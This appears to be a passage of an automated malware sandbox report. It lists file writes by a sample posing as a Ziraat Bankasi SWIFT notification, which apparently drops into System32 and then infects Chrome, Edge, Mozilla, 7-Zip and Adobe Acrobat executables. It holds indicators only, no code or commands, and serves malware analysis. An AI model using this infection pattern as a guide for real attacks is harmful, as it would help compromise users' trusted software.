Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1347720	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1340928	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Windows\System32\AppVClient.exe offset: 409168	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Windows\System32\config\systemprofile\AppData\Roaming\a8259331cca430bb.bin offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 2136576	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 2710092	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 2710016	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 1093484	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 1776128	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349644	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349568	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 677164	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 228352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801868	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801792	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 43297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 557056	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 1130572	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 1130496	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 382726	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 952832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 1526348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 1526272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 614020	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 700416	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 1273932	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 1273856	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 464916	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 14848	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588288	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 5610	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 5630464	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203980	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203904	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 3201596	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 27136	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600652	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600576	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 8988	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 31744	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605260	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605184	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 12684	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 332800	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906316	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906240	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 232412	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 3571200	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144640	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 1485948	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59362816	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936332	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 140924	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 3571200	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144640	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 1485948	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59362816	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936332	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 140924	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 50176	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623692	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623616	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 24668	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 328192	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901708	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901632	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 4988	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 642048	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215564	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215488	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 132252	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 11459072	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032588	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 4630732	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 192512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 766028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 765952	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 95345	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 759296	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332812	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332736	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 285633	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 385536	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 959052	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 958976	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 182364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 123904	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697420	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697344	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 66716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1102848	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676288	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 753617	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 2531840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105356	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
